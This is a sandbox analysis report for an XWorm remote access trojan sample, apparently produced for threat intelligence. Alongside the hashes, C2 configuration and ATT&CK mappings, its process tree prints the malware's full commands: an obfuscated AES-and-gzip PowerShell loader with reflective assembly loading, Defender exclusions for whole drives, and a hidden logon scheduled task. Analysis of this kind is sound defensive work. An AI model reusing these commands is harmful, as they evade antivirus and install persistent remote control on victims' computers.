xworm | f032af2d2f26cad5b8e05f6f79a79a5234584e6a0d6534f2b9f198a895974538

Analysis

max time kernel
134s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
08/07/2024, 22:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sixinternal/StateRepository.Core.dll
Size

2.7MB
MD5

0e2726aebe9351faf0164c936c1541be
SHA1

50886184463c3ef02d450b63815a37d0b1e06783
SHA256

f427a03ce3553cc7c33a29139886db6d178e40baa11a697a391524e5dd527dbd
SHA512

3a0eccaf6aefed1d9334be5039b25054faa89dba51941ef9c51fb79e96bb60cc392f97241ca7983e15c98933f9b333d3ffc5225669339bd7a24f5248fb292ba8
SSDEEP

49152:i5dQAYEDdu7ol4NqgF1QwgDz8Km8bTMo0eamyn:SIsu7ol4N7o0eamyn

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

software-led.gl.at.ply.gg:38954

Mutex

m6tgeOEIIMDuaFcQ

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2464-163-0x0000023D73440000-0x0000023D7344E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 5 IoCs

flow	pid	Process
18	2464	powershell.exe
35	2464	powershell.exe
41	2464	powershell.exe
44	2464	powershell.exe
49	2464	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3816	powershell.exe
3164	powershell.exe
412	powershell.exe
448	powershell.exe
2464	powershell.exe
4788	powershell.exe
1060	powershell.exe
1968	powershell.exe
4416	powershell.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
3816	powershell.exe
3816	powershell.exe
3164	powershell.exe
3164	powershell.exe
3164	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
1968	powershell.exe
1968	powershell.exe
1968	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
4524	powershell.exe
4524	powershell.exe
448	powershell.exe
448	powershell.exe
448	powershell.exe
4524	powershell.exe
2464	powershell.exe
2464	powershell.exe
2464	powershell.exe
4788	powershell.exe
4788	powershell.exe
4788	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
3152	powershell.exe
3152	powershell.exe
3152	powershell.exe
980	powershell.exe
980	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
980	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3816	powershell.exe
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeIncreaseQuotaPrivilege	5000	powershell.exe
Token: SeSecurityPrivilege	5000	powershell.exe
Token: SeTakeOwnershipPrivilege	5000	powershell.exe
Token: SeLoadDriverPrivilege	5000	powershell.exe
Token: SeSystemProfilePrivilege	5000	powershell.exe
Token: SeSystemtimePrivilege	5000	powershell.exe
Token: SeProfSingleProcessPrivilege	5000	powershell.exe
Token: SeIncBasePriorityPrivilege	5000	powershell.exe
Token: SeCreatePagefilePrivilege	5000	powershell.exe
Token: SeBackupPrivilege	5000	powershell.exe
Token: SeRestorePrivilege	5000	powershell.exe
Token: SeShutdownPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeSystemEnvironmentPrivilege	5000	powershell.exe
Token: SeRemoteShutdownPrivilege	5000	powershell.exe
Token: SeUndockPrivilege	5000	powershell.exe
Token: SeManageVolumePrivilege	5000	powershell.exe
Token: 33	5000	powershell.exe
Token: 34	5000	powershell.exe
Token: 35	5000	powershell.exe
Token: 36	5000	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeIncreaseQuotaPrivilege	448	powershell.exe
Token: SeSecurityPrivilege	448	powershell.exe
Token: SeTakeOwnershipPrivilege	448	powershell.exe
Token: SeLoadDriverPrivilege	448	powershell.exe
Token: SeSystemProfilePrivilege	448	powershell.exe
Token: SeSystemtimePrivilege	448	powershell.exe
Token: SeProfSingleProcessPrivilege	448	powershell.exe
Token: SeIncBasePriorityPrivilege	448	powershell.exe
Token: SeCreatePagefilePrivilege	448	powershell.exe
Token: SeBackupPrivilege	448	powershell.exe
Token: SeRestorePrivilege	448	powershell.exe
Token: SeShutdownPrivilege	448	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeSystemEnvironmentPrivilege	448	powershell.exe
Token: SeRemoteShutdownPrivilege	448	powershell.exe
Token: SeUndockPrivilege	448	powershell.exe
Token: SeManageVolumePrivilege	448	powershell.exe
Token: 33	448	powershell.exe
Token: 34	448	powershell.exe
Token: 35	448	powershell.exe
Token: 36	448	powershell.exe
Token: SeIncreaseQuotaPrivilege	448	powershell.exe
Token: SeSecurityPrivilege	448	powershell.exe
Token: SeTakeOwnershipPrivilege	448	powershell.exe
Token: SeLoadDriverPrivilege	448	powershell.exe
Token: SeSystemProfilePrivilege	448	powershell.exe
Token: SeSystemtimePrivilege	448	powershell.exe
Token: SeProfSingleProcessPrivilege	448	powershell.exe
Token: SeIncBasePriorityPrivilege	448	powershell.exe
Token: SeCreatePagefilePrivilege	448	powershell.exe
Token: SeBackupPrivilege	448	powershell.exe
Token: SeRestorePrivilege	448	powershell.exe
Token: SeShutdownPrivilege	448	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeSystemEnvironmentPrivilege	448	powershell.exe
Token: SeRemoteShutdownPrivilege	448	powershell.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 4864 wrote to memory of 4300	4864	rundll32.exe	89
PID 4864 wrote to memory of 4300	4864	rundll32.exe	89
PID 4300 wrote to memory of 3816	4300	cmd.exe	91
PID 4300 wrote to memory of 3816	4300	cmd.exe	91
PID 3816 wrote to memory of 1928	3816	powershell.exe	95
PID 3816 wrote to memory of 1928	3816	powershell.exe	95
PID 1928 wrote to memory of 2372	1928	cmd.exe	99
PID 1928 wrote to memory of 2372	1928	cmd.exe	99
PID 1928 wrote to memory of 4256	1928	cmd.exe	100
PID 1928 wrote to memory of 4256	1928	cmd.exe	100
PID 4256 wrote to memory of 3764	4256	cmd.exe	102
PID 4256 wrote to memory of 3764	4256	cmd.exe	102
PID 4256 wrote to memory of 3136	4256	cmd.exe	103
PID 4256 wrote to memory of 3136	4256	cmd.exe	103
PID 4256 wrote to memory of 3164	4256	cmd.exe	104
PID 4256 wrote to memory of 3164	4256	cmd.exe	104
PID 3164 wrote to memory of 412	3164	powershell.exe	106
PID 3164 wrote to memory of 412	3164	powershell.exe	106
PID 3164 wrote to memory of 1968	3164	powershell.exe	108
PID 3164 wrote to memory of 1968	3164	powershell.exe	108
PID 3164 wrote to memory of 5000	3164	powershell.exe	110
PID 3164 wrote to memory of 5000	3164	powershell.exe	110
PID 3164 wrote to memory of 4524	3164	powershell.exe	112
PID 3164 wrote to memory of 4524	3164	powershell.exe	112
PID 3164 wrote to memory of 448	3164	powershell.exe	114
PID 3164 wrote to memory of 448	3164	powershell.exe	114
PID 3164 wrote to memory of 2404	3164	powershell.exe	116
PID 3164 wrote to memory of 2404	3164	powershell.exe	116
PID 2404 wrote to memory of 4360	2404	cmd.exe	118
PID 2404 wrote to memory of 4360	2404	cmd.exe	118
PID 4360 wrote to memory of 412	4360	cmd.exe	120
PID 4360 wrote to memory of 412	4360	cmd.exe	120
PID 4360 wrote to memory of 3900	4360	cmd.exe	121
PID 4360 wrote to memory of 3900	4360	cmd.exe	121
PID 4360 wrote to memory of 2464	4360	cmd.exe	122
PID 4360 wrote to memory of 2464	4360	cmd.exe	122
PID 2464 wrote to memory of 4788	2464	powershell.exe	123
PID 2464 wrote to memory of 4788	2464	powershell.exe	123
PID 2464 wrote to memory of 4416	2464	powershell.exe	124
PID 2464 wrote to memory of 4416	2464	powershell.exe	124
PID 2464 wrote to memory of 3152	2464	powershell.exe	126
PID 2464 wrote to memory of 3152	2464	powershell.exe	126
PID 2464 wrote to memory of 980	2464	powershell.exe	128
PID 2464 wrote to memory of 980	2464	powershell.exe	128
PID 2464 wrote to memory of 1060	2464	powershell.exe	130
PID 2464 wrote to memory of 1060	2464	powershell.exe	130

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\sixinternal\StateRepository.Core.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:4864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File calc.ps1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File calc.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dnfxa0tp.ugr.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1928
    - - C:\Windows\system32\cmd.exe
        
        cmd /c "set __=^&rem"
        5⤵
        
        PID:2372
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\dnfxa0tp.ugr.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4256
      - C:\Windows\system32\cmd.exe
        
        cmd /c "set __=^&rem"
        6⤵
        
        PID:3764
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dnfxa0tp.ugr.bat';$YBFF='EsFdOlesFdOmensFdOtsFdOAtsFdO'.Replace('sFdO', ''),'LoIhFSadIhFS'.Replace('IhFS', ''),'TrarwGknrwGksforwGkrmrwGkFirwGknrwGkarwGklrwGkBlrwGkorwGkcrwGkkrwGk'.Replace('rwGk', ''),'MafwIkinfwIkMofwIkdfwIkufwIklefwIk'.Replace('fwIk', ''),'GeDLuatDLuaCDLuaurDLuareDLuantDLuaPDLuaroDLuacDLuaeDLuassDLua'.Replace('DLua', ''),'DecOTLfoOTLfmpOTLfreOTLfssOTLf'.Replace('OTLf', ''),'ChDVOnaDVOnngDVOneDVOnExtDVOnenDVOnsDVOnionDVOn'.Replace('DVOn', ''),'CVPSIopyVPSITVPSIoVPSI'.Replace('VPSI', ''),'SplDpWlitlDpW'.Replace('lDpW', ''),'CrGGxDeGGxDateGGxDDeGGxDcrGGxDyptGGxDoGGxDrGGxD'.Replace('GGxD', ''),'FTYCVroTYCVmBTYCVasTYCVe6TYCV4TYCVSTYCVtTYCVriTYCVngTYCV'.Replace('TYCV', ''),'IncTcZvokcTcZecTcZ'.Replace('cTcZ', ''),'EnllgdtrllgdyPllgdollgdillgdntllgd'.Replace('llgd', ''),'ReoxgFaoxgFdLioxgFnesoxgF'.Replace('oxgF', '');powershell -w hidden;function DVuQU($SLEWG){$uejDu=[System.Security.Cryptography.Aes]::Create();$uejDu.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uejDu.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uejDu.Key=[System.Convert]::($YBFF[10])('YQXaNbfbo2jsotDHEecXMMMus5aNXxpkWd7GQjV8O2w=');$uejDu.IV=[System.Convert]::($YBFF[10])('lrG/ZLWWFZfwxu49S3LmQw==');$SnotF=$uejDu.($YBFF[9])();$ADLZH=$SnotF.($YBFF[2])($SLEWG,0,$SLEWG.Length);$SnotF.Dispose();$uejDu.Dispose();$ADLZH;}function EVmyh($SLEWG){$Ssdjt=New-Object System.IO.MemoryStream(,$SLEWG);$ajnRS=New-Object System.IO.MemoryStream;$NhgIN=New-Object System.IO.Compression.GZipStream($Ssdjt,[IO.Compression.CompressionMode]::($YBFF[5]));$NhgIN.($YBFF[7])($ajnRS);$NhgIN.Dispose();$Ssdjt.Dispose();$ajnRS.Dispose();$ajnRS.ToArray();}$oSddA=[System.IO.File]::($YBFF[13])([Console]::Title);$QmKvB=EVmyh (DVuQU ([Convert]::($YBFF[10])([System.Linq.Enumerable]::($YBFF[0])($oSddA, 5).Substring(2))));$rAPqA=EVmyh (DVuQU ([Convert]::($YBFF[10])([System.Linq.Enumerable]::($YBFF[0])($oSddA, 6).Substring(2))));[System.Reflection.Assembly]::($YBFF[1])([byte[]]$rAPqA).($YBFF[12]).($YBFF[11])($null,$null);[System.Reflection.Assembly]::($YBFF[1])([byte[]]$QmKvB).($YBFF[12]).($YBFF[11])($null,$null); "
        6⤵
        
        PID:3136
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dnfxa0tp.ugr')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52YWxpZCBkYXRhIHNldCBuYW1lIGVycm9yCg==')), 'Error', [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Error)
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 51438' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4360
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "set __=^&rem"
        9⤵
        
        PID:412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';$YBFF='EsFdOlesFdOmensFdOtsFdOAtsFdO'.Replace('sFdO', ''),'LoIhFSadIhFS'.Replace('IhFS', ''),'TrarwGknrwGksforwGkrmrwGkFirwGknrwGkarwGklrwGkBlrwGkorwGkcrwGkkrwGk'.Replace('rwGk', ''),'MafwIkinfwIkMofwIkdfwIkufwIklefwIk'.Replace('fwIk', ''),'GeDLuatDLuaCDLuaurDLuareDLuantDLuaPDLuaroDLuacDLuaeDLuassDLua'.Replace('DLua', ''),'DecOTLfoOTLfmpOTLfreOTLfssOTLf'.Replace('OTLf', ''),'ChDVOnaDVOnngDVOneDVOnExtDVOnenDVOnsDVOnionDVOn'.Replace('DVOn', ''),'CVPSIopyVPSITVPSIoVPSI'.Replace('VPSI', ''),'SplDpWlitlDpW'.Replace('lDpW', ''),'CrGGxDeGGxDateGGxDDeGGxDcrGGxDyptGGxDoGGxDrGGxD'.Replace('GGxD', ''),'FTYCVroTYCVmBTYCVasTYCVe6TYCV4TYCVSTYCVtTYCVriTYCVngTYCV'.Replace('TYCV', ''),'IncTcZvokcTcZecTcZ'.Replace('cTcZ', ''),'EnllgdtrllgdyPllgdollgdillgdntllgd'.Replace('llgd', ''),'ReoxgFaoxgFdLioxgFnesoxgF'.Replace('oxgF', '');powershell -w hidden;function DVuQU($SLEWG){$uejDu=[System.Security.Cryptography.Aes]::Create();$uejDu.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uejDu.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uejDu.Key=[System.Convert]::($YBFF[10])('YQXaNbfbo2jsotDHEecXMMMus5aNXxpkWd7GQjV8O2w=');$uejDu.IV=[System.Convert]::($YBFF[10])('lrG/ZLWWFZfwxu49S3LmQw==');$SnotF=$uejDu.($YBFF[9])();$ADLZH=$SnotF.($YBFF[2])($SLEWG,0,$SLEWG.Length);$SnotF.Dispose();$uejDu.Dispose();$ADLZH;}function EVmyh($SLEWG){$Ssdjt=New-Object System.IO.MemoryStream(,$SLEWG);$ajnRS=New-Object System.IO.MemoryStream;$NhgIN=New-Object System.IO.Compression.GZipStream($Ssdjt,[IO.Compression.CompressionMode]::($YBFF[5]));$NhgIN.($YBFF[7])($ajnRS);$NhgIN.Dispose();$Ssdjt.Dispose();$ajnRS.Dispose();$ajnRS.ToArray();}$oSddA=[System.IO.File]::($YBFF[13])([Console]::Title);$QmKvB=EVmyh (DVuQU ([Convert]::($YBFF[10])([System.Linq.Enumerable]::($YBFF[0])($oSddA, 5).Substring(2))));$rAPqA=EVmyh (DVuQU ([Convert]::($YBFF[10])([System.Linq.Enumerable]::($YBFF[0])($oSddA, 6).Substring(2))));[System.Reflection.Assembly]::($YBFF[1])([byte[]]$rAPqA).($YBFF[12]).($YBFF[11])($null,$null);[System.Reflection.Assembly]::($YBFF[1])([byte[]]$QmKvB).($YBFF[12]).($YBFF[11])($null,$null); "
        9⤵
        
        PID:3900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52YWxpZCBkYXRhIHNldCBuYW1lIGVycm9yCg==')), 'Error', [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Error)
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 51438' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3856,i,4226873509039249198,15952596839998010243,262144 --variations-seed-version --mojo-platform-channel-handle=1280 /prefetch:8
1⤵
PID:2392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac887b635b50b93c3baa94e2eda2781b

SHA1
7ef437fae96969f8ddb1d54c7ad4a2555b9f50ee

SHA256
3883414a8f77a3b3f7e4e3de75ffea3f64af672a95dde44f5542e202898474d3

SHA512
2c5085faf82625143cdf1b14c05e7d9bb9fe89bc493efffd5018df76cdeb0cab219867bcf9c825a7c61da67b72054d9a0b767f1c13e4a8aecc22d649602f0e43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0dfc87d52784026f73d57192cb575195

SHA1
720cfc0cff7f21a4ab235f5b3a16beb28ea6d9fd

SHA256
bfd4b6a533b4e3a2a884e6f1445f646a3d83a41f6e4060964279c9b4c87a5ef2

SHA512
c6c98a666ff7880bdeaae69e200ee93fe0d6e0bfd4046bd184cf5d8209fd18439f9bfb8e3e8b5e75656c3c0deaf2dea2843061df1c2a98310dd5405cb7458604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa0fee5a056d5fdffdfc0d30fdd6bcdf

SHA1
be1aa4535e3136c361bda84dbc655b06b5efdeea

SHA256
9335f66079afe7a7cd204a2d75cc03bc1cf30ce66b0dee317ebb96554fc40cc0

SHA512
9011fd2d00acb7e2cc5df8c437ed593fbbc16a723b340c08d77fa78b784f832214f93f5b15901141ea7111d457b25a51a1a91fef7f42bf0b5bb555c922201ec9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fe8ea99187692140488198af2a41d1b9

SHA1
8485863ac88e5a210519bf9523678f0974d456d4

SHA256
186150558a66c33a86ba78767a221011a1712636c9d34aad3bd7051c4527e9f5

SHA512
23e44908e1ae7c63a3fdd0b2101c92487d286ba1b19d44117b4b4c9f4b29e101d96727e4aeead691b5967a96155341d79863655f37c4b3b5c41aa3dcc4a3b1f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
66898dbf1d1f32af63256328731f2c9e

SHA1
21f5828b21fae6d81e57a11e113440c95e1752de

SHA256
258ea4ccbc181f6b86d3a819981d9cf526950f1aa7517b12cda14b856aad8c90

SHA512
65ab1f1224ba418a733b6fe9aecead3c97cb92bf236ffddd77ab70361d81d3d02c24e45c7db1019724d52a0556e2248ed23f696cb49b970efce0bba1666b5e94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a6f3ab606a1c2239569ddb8eb6ee9534

SHA1
2380d75eeeb9786560c6b1d5198a77471d15b83f

SHA256
768be622a24f202c5cca53a393a40bf2345cb3acfea03ec092e2c5806f0e54c5

SHA512
7e1e6a8512a69425cc6dda5dc79e40206d33a5aefe0baa382e139cbc1fb2ad695170882ce91a89b464614f885a130c0fd2a4c018a8740b14a86bf4165d81a30c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rght2jr5.bta.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dnfxa0tp.ugr.bat

Filesize
162KB

MD5
45a0bf2863742de95beb8d20f2d882b4

SHA1
f8b0f518972b707dab582c83e78d6575fd09636f

SHA256
210a55ba1e6b5c80ff8c2861d414caf12c724b11b1ab5148071c0b329c64a0b3

SHA512
8370da88d48ecbf6cc361a6301784933f79d946e703b6308e592b71ade48f617f3f61adb8acfcea6f0888d98bbd5e19129b25d6f583619763df2e4fee9bb6839

Download Submit
C:\Users\Admin\AppData\Local\Temp\sixinternal\calc.ps1

Filesize
325KB

MD5
b88fd6d983a31bc7392f3163f6819d5b

SHA1
042f8560bb8073104b415e8a11f4e4d5296a6fa4

SHA256
0f31c1881815487c713331c19eadbe6a987845965c31a00b544b2775e38a68aa

SHA512
214198aca2d6f537ada2d5690636ceef03ccf2590d567a120323749282d437ebf08cf0734fa299ae26b7a4b178c3966e76e14792c5b2c5bb1c666f749b60a639

Download Submit
memory/2464-117-0x00007FFE25790000-0x00007FFE25985000-memory.dmp

Filesize
2.0MB

Download
memory/2464-163-0x0000023D73440000-0x0000023D7344E000-memory.dmp

Filesize
56KB

Download
memory/2464-118-0x00007FFE24180000-0x00007FFE2423E000-memory.dmp

Filesize
760KB

Download
memory/3164-49-0x00007FFE24180000-0x00007FFE2423E000-memory.dmp

Filesize
760KB

Download
memory/3164-50-0x0000028FDAAA0000-0x0000028FDAAC0000-memory.dmp

Filesize
128KB

Download
memory/3164-48-0x00007FFE25790000-0x00007FFE25985000-memory.dmp

Filesize
2.0MB

Download
memory/3164-35-0x0000028FDCED0000-0x0000028FDCF14000-memory.dmp

Filesize
272KB

Download
memory/3164-47-0x0000028FDAA90000-0x0000028FDAAA2000-memory.dmp

Filesize
72KB

Download
memory/3164-36-0x0000028FDCFA0000-0x0000028FDD016000-memory.dmp

Filesize
472KB

Download
memory/3816-12-0x00007FFE06B80000-0x00007FFE07641000-memory.dmp

Filesize
10.8MB

Download
memory/3816-2-0x000001B836E40000-0x000001B836E62000-memory.dmp

Filesize
136KB

Download
memory/3816-1-0x00007FFE06B83000-0x00007FFE06B85000-memory.dmp

Filesize
8KB

Download
